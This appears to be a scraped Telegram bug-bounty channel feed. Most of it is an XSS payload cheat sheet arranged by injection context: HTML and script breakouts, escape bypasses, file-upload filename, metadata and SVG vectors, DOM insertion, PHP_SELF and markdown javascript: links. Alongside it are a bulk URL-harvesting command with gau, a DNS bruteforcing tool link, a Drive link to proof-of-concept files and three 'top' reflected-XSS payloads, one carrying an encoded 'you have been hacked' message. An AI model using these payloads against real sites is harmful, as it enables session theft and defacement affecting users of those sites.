πuse xargs with gau to scan bulk domains without losing speedπ
πCommand
πCommand
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt
π₯15β€2π1
πXSS Secrets by Donald Bucksπ
HTML Injection
File Upload Injection β Filename
File Upload Injection β Metadata
File Upload Injection β SVG File
DOM Insert Injection
DOM Insert Injection β Resource Request
PHP Self URL Injection
HTML Injection
Use when input lands inside an attributeβs value of an HTML tag or outside tag except the ones described in next case. Prepend a β-->β to payload if input lands in HTML comments.
<svg onload=alert(1)>
"><svg onload=alert(1)>
HTML Injection β Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<title><style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
HTML Injection - Inline
Use when input lands inside an attributeβs value of an HTML tag but that tag canβt be terminated by greater than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
HTML Injection - Source
Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). Src attribute in script tags can be an URL or βdata:,alert(1)β.
javascript:alert(1)
Javascript Injection
Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//
Javascript Injection - Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//
Javascript Injection β Script Breakout
Use when input lands anywhere within a script block.
</script><svg onload=alert(1)>
Javascript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
Javascript Injection - Quoteless
Use when thereβs multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\
Javascript Context - Placeholder Injection in Template LiteralUse when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}
Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
/alert(1)</script><script>/
Multi Reflection i HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
/</script>'>alert(1)/<script/1='
Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/&r=/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
File Upload Injection β Filename
Use when uploaded filename is reflected somewhere in target page.
"><svg onload=alert(1)>.gif
File Upload Injection β Metadata
Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (β$β is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
File Upload Injection β SVG File
Use to create a stored XSS on target when uploading image files. Save content below as
βxss.svgβ.
<svg xmlns="https://www.w3.org/2000/svg" onload="alert(1)"/>
DOM Insert Injection
Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where script tag and other vectors wonβt work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
DOM Insert Injection β Resource Request
Use when native javascript code inserts into page the results of a request to an URL that can be controlled by attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
PHP Self URL Injection
π6π₯4β€2π1
Use when current URL is used by targetβs underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Markdown Vector
Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javascript:alert`1`)
π₯8β€4
This media is not supported in your browser
VIEW IN TELEGRAM
πDnsbruter- Dns Bruteforcing Toolπ
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
π₯7π3
πBug Bounty PoC'sπ
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β€16π5π₯3
Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
β€6π₯3β€βπ₯1π1